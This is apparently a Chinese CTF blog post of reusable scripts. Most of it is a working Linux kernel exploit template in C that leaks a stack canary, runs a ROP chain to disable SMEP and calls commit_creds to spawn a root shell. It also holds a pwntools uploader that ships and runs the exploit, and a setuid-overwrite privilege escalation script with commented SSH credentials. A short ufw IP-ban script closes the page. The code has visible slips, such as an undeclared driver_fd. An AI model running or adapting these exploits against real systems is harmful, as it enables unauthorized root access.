【杂项】一些常用的脚本

Kernel 解题脚本模型

这里放的是 bypass smep 的脚本

#include <err.h>
#include <fcntl.h>
#include <stdint.h>

struct trap_frame{
    void *rip;
    uint64_t cs;
    uint64_t rflags;
    void * rsp;
    uint64_t ss;
}__attribute__((packed));
struct trap_frame tf;

uint64_t(*prepare_kernel_cred)(uint64_t cred) = 0xffffffff810b9d80;
uint64_t(*commit_creds)(uint64_t cred) = 0xffffffff810b99d0;

void shell(){
    system("/bin/sh");
}

void templine(){
    commit_creds(prepare_kernel_cred(0));
    asm(
        "movq $tf, %rsp;"
        "swapgs;"
        "iretq;"
    );
}

void save_status(){
    asm(
        "mov %%cs, %0;"
        "mov %%ss,%1;"
        "mov %%rsp,%3;"
        "pushfq;"
        "popq %2;"
        :"=r"(tf.cs), "=r"(tf.ss), "=r"(tf.rflags), "=r"(tf.rsp)
        :
        : "memory"
    );
    tf.rsp -= 0x1000;
    tf.rip = &shell;
}


int main(){
    save_status();
    uint64_t temp[0x200];
    int fd1 = open("/dev/baby", O_RDWR);
    if(fd1 < 0){
        err(2, "[*] fd1 open failed");
        exit(0);
    }
    ioctl(driver_fd, 0x6002, &temp);
    int i;
    for(i = 0; i < 0x100; ++i){
        printf("[0x%03x] %p\n", i, temp[i]);
    }
    uint64_t stack_no_kaslr = 0xffffffff8129b078;
    uint64_t stackbase = temp[0x009] - stack_no_kaslr;
    uint64_t iCanary = temp[0x00d];
    uint64_t rop_mov_cr4_rdi = stackbase + 0xffffffff81020300;
    uint64_t rop_pop_rdi_ret = stackbase + 0xffffffff8100631d;
    commit_creds += stackbase;
    prepare_kernel_cred += stackbase;
    printf("[+]stack_no_kaslr      = %p\n", stack_no_kaslr);
    printf("[+]iCanary             = %p\n", iCanary);
    printf("[+]rop_pop_rdi_ret     = %p\n", rop_pop_rdi_ret);
    printf("[+]rop_mov_cr4_rdi     = %p\n", rop_mov_cr4_rdi);
    printf("[+]commit_creds        = %p\n", commit_creds);
    printf("[+]prepare_kernel_cred = %p\n", prepare_kernel_cred);
    i = 0x10;
    temp[i++] = iCanary;
    i++;
    temp[i++] = rop_pop_rdi_ret;
    temp[i++] = 0x6f0;
    temp[i++] = rop_mov_cr4_rdi;
    i++;
    temp[i++] = &templine;
    ioctl(driver_fd, 0x6001, &temp);
    return 0;
}

Kernel 文件上传脚本

这里放的是普通用户的,如果是调试 root 用户,把cmd = '$ '改为cmd = '# '即可

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import os

# context.log_level = 'debug'
cmd = '$ '


def exploit(r):
    r.sendlineafter(cmd, 'stty -echo')
    os.system('musl-gcc  -static -O2 ./poc/exp.c -o ./poc/exp')
    os.system('gzip -c ./poc/exp > ./poc/exp.gz')
    r.sendlineafter(cmd, 'cat <<EOF > exp.gz.b64')
    r.sendline((read('./poc/exp.gz')).encode('base64'))
    r.sendline('EOF')
    r.sendlineafter(cmd, 'base64 -d exp.gz.b64 > exp.gz')
    r.sendlineafter(cmd, 'gunzip ./exp.gz')
    r.sendlineafter(cmd, 'chmod +x ./exp')
    r.sendlineafter(cmd, './exp')
    r.interactive()


p = process('./startvm.sh', shell=True)
# p = remote('', )

exploit(p)

Kernel 利用 s 标志位文件进行提权

这里假设 umount 文件是可写且拥有 s 标志位的文件

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

p = process('./startvm.sh', shell=True)
# p = remote('localhost', 1234)

# ssh_p = ssh('pwn', '121.37.167.199', port = 10022,password='pwn')
# p = ssh_p.shell()
p.sendlineafter('$', 'cd /')
p.sendlineafter('$', "echo '#!/bin/sh' > /bin/umount")
p.sendlineafter('$', "echo '/bin/sh' >> /bin/umount")
p.sendlineafter('$', "chmod +x /bin/umount")
p.sendlineafter('$', "exit")
p.sendline("cat /flag")
p.interactive()
# ssh_p.close()

ban 他人 ip

两个文件:一个脚本,一个被脚本访问的 ip 列表

ban_ip.sh

#!/bin/bash -x
for line in `cat ip_table`; do
  ufw deny from ${line%?} to any
done
ufw reload

ip_table

自行添加需要 ban 的 ip

101.133.213.44
47.116.106.203
47.116.108.82

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注